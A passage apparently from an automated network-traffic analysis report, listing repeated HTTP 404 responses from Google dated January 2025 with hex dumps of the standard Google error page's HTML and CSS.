28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:19:03 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:19:05 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:19:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:19:08 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:19:09 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 13 Jan 2025 12:19:10 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 